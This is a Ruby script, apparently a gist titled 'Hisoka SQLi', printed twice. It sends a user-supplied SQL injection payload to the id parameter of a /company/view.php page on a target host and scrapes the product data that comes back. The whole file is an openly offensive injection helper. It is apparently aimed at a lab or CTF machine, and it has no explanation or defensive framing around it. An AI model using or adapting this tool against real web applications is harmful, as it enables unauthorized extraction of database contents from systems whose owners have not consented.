KINGSABRI/hisokaSQLiBrowser.rb

## hisokaSQLiBrowser.rb
#!/usr/bin/env ruby
#
# KING SABRI
# Hisoka SQLi - For Ibrahim
#
require 'open-uri'
require 'uri'

if ARGV.size < 2
  puts "[+] ruby #{__FILE__} <IP_ADDRESS> <PAYLOAD>"
  exit 0
else
  host, payload = ARGV
end

def sqli(host, payload)
  begin
    url = URI.parse("http://#{host}/company/view.php?id=#{payload}")
    puts "\n[*] URL: #{url}"
    request  = open(url)
    response = request.read

    data = response.gsub(/<.*?>/, "").gsub(/[\t|\r\n]/, "")
    data_bad  = data.match(/(Product Info).*(Product not)/).to_s.gsub(/(Product Info )/, '').gsub(/(Product not)/, '')
    data_good = data.match(/(Product Info).*(Price)/).to_s.gsub(/(Product Info )/, '').gsub(/(5Price)/, '')

    return data_bad  unless data.scan(/(Product Info).*(Product not)/).empty?
    return data_good unless data.scan(/(Product Info).*(Price)/).empty?
  rescue Exception => e
    puts "[!] Error!: #{e}"
  end
end

puts sqli(host, payload).split(',')
puts ""
	#!/usr/bin/env ruby
	#
	# KING SABRI
	# Hisoka SQLi - For Ibrahim
	#
	require 'open-uri'
	require 'uri'

	if ARGV.size < 2
	puts "[+] ruby #{__FILE__} <IP_ADDRESS> <PAYLOAD>"
	exit 0
	else
	host, payload = ARGV
	end

	def sqli(host, payload)
	begin
	url = URI.parse("http://#{host}/company/view.php?id=#{payload}")
	puts "\n[*] URL: #{url}"
	request = open(url)
	response = request.read

	data = response.gsub(/<.*?>/, "").gsub(/[\t\|\r\n]/, "")
	data_bad = data.match(/(Product Info).*(Product not)/).to_s.gsub(/(Product Info )/, '').gsub(/(Product not)/, '')
	data_good = data.match(/(Product Info).*(Price)/).to_s.gsub(/(Product Info )/, '').gsub(/(5Price)/, '')

	return data_bad unless data.scan(/(Product Info).*(Product not)/).empty?
	return data_good unless data.scan(/(Product Info).*(Price)/).empty?
	rescue Exception => e
	puts "[!] Error!: #{e}"
	end
	end

	puts sqli(host, payload).split(',')
	puts ""